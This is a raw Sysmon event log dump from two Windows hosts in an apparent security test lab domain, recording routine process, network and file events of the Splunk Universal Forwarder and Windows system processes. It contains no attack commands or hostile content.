21:48:00.929{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105235Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:00.929{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105234Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:00.928{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-7190-60CA-3913-00000000CF01}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000105233Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:00.928{54715871-7190-60CA-3913-00000000CF01}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000105232Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:00.388{54715871-7190-60CA-3813-00000000CF01}42445108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105231Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:00.252{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-7190-60CA-3813-00000000CF01}4244C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105230Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:00.250{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105229Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:00.250{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105228Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:00.249{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105227Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:00.249{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105226Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:00.249{54715871-FD16-60C9-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{54715871-7190-60CA-3813-00000000CF01}4244C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000105225Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:00.249{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-7190-60CA-3813-00000000CF01}4244C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000105224Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:00.248{54715871-7190-60CA-3813-00000000CF01}4244C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000105223Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:57.780{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55446-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000152017Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:00.928{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1697A3065C04D4D4FB2859059F61BC62,SHA256=C640D4E45170A6FB02121CBEDFF631346EA196B9B488353D8513154581E0F93E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105251Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:01.816{54715871-7191-60CA-3A13-00000000CF01}11446480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105250Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:01.616{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-7191-60CA-3A13-00000000CF01}1144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105249Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:01.612{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105248Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:01.612{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105247Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:01.611{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105246Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:01.610{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105245Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:01.610{54715871-FD16-60C9-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{54715871-7191-60CA-3A13-00000000CF01}1144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000105244Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:01.609{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-7191-60CA-3A13-00000000CF01}1144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000105243Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:01.609{54715871-7191-60CA-3A13-00000000CF01}1144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000105242Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:01.084{54715871-7190-60CA-3913-00000000CF01}35846212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000152021Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:01.943{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1F2AD464CC1A924E92C4B006EBA5B92,SHA256=07FED23ECC371784D9F13D82CD263E965B3FFF3435B62ECD2AC0E661237D6F2F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000152020Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:00.026{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58428-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000152019Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:01.227{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2E4686D10D72560C3D3C544E455C4FA7,SHA256=645BBC5DBA437D68F03DC7028658BBA8D960E80B7B013A55803243EA602E2BD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152018Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:01.227{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A7ABD44F421669CA575CD1A64275168,SHA256=F1105CF2EC3AC3C96FBE02F2C63ED1D5E24DEBA911700BDFB6D57606A9AA5AC2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105261Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:02.779{54715871-7192-60CA-3B13-00000000CF01}66767012C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105260Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:02.625{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-7192-60CA-3B13-00000000CF01}6676C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105259Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 